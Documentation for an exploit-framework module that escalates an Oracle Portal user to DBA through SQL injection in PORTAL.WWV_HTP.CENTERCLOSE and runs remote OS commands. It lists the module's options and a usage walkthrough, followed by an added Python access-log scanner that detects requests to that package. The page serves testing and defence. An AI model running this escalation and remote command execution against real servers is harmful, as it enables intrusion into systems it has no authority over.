auxiliary scanners oracle_portal_runcmd
CG [carnal0wnage]
Oracle Portal Privilege Escalation. Tries various privilege escalation exploits against Oracle Portal installations that are vulnerable to SQL injection, in an attempt to escalate the current portal user to DBA.
http://www.owasp.org/index.php/Testing_for_Oracle
Name       Default                          Required  Description
COMMAND    ipconfig                         true      The command to run
DAD        portal/                          true      The Database Access Descriptor
INJECTION  PORTAL.WWV_HTP.CENTERCLOSE       true      The vulnerable injection package
JAVASETUP  true                             true      Set up java libs and command function
PROXYA                                      false     Proxy IP Address
PROXYP                                      false     Proxy Port Number
RURL       http://www.example.com/test.php  true      Target address
URIPATH    /pls/                            true      The URI PATH
VERIFY     true                             true      Verify URL and DBA Status
INJECTION -- Vulnerable Injection Package
URIPATH -- Path (before portal).
DAD -- The DAD can change per-site depending on what they've named it OR if they've left the default DAD in. Either way, change if necessary.
VERIFY -- If set to true, will verify URL & DBA status
JAVASETUP -- Inject Java specific commands
COMMAND -- The command you'd like to run on the remote server
Our target is http://vulnoraclesappisembarassingitself.com and it has a DAD at portal, so leave the default setting. If you change the DAD, append a '/' after the new name. For example, to change from portal to portal30:
set DAD portal30/
The same applies to pls, except that the '/' is both prepended and appended. For example:
set URIPATH /expls/
We'd like to run the command 'ls':
set COMMAND ls
set RURL http://vulnoraclesappisembarassingitself.com
run
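
For defenders, the URIPATH, DAD and INJECTION options above describe a request of the form <URIPATH><DAD>/<package.procedure>, which can be looked for in web server access logs. The following is an added example, not part of wXf or of the original page; the function names, the combined log format and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Package named on this page (default INJECTION value); extend as needed.
WATCHED = {"PORTAL.WWV_HTP.CENTERCLOSE"}
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def parse_target(target, uripath="/pls/"):
    """Return (dad, procedure) for a <uripath><DAD>/<procedure> request, else None."""
    path = unquote(urlsplit(target).path)      # decode %2e etc. before matching
    if not path.lower().startswith(uripath.lower()):
        return None
    dad, sep, proc = path[len(uripath):].partition("/")
    if not (dad and sep and proc):
        return None
    return dad, proc.upper()                   # PL/SQL names are case-insensitive

def scan(lines, uripath="/pls/"):
    """Return (line_no, dad, procedure) for each request to a watched procedure."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        parsed = parse_target(m.group("target"), uripath) if m else None
        if parsed and parsed[1] in WATCHED:
            hits.append((no, parsed[0], parsed[1]))
    return hits

# Constructed sample lines (documentation IP addresses, generic query string).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /pls/portal/PORTAL.home HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /pls/portal/portal.wwv_htp.centerclose?p=1 HTTP/1.1" 200 87',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /pls/portal30/PORTAL.WWV_HTP%2eCENTERCLOSE?p=1 HTTP/1.1" 200 87',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '192.0.2.44 - - [01/Jan/2024:10:00:15 +0000] "GET /expls/portal/PORTAL.WWV_HTP.CENTERCLOSE?p=1 HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the DAD name and the URI path differ per site, as noted above, run the scan with the uripath your own server uses and report the DAD it extracts rather than matching a fixed path.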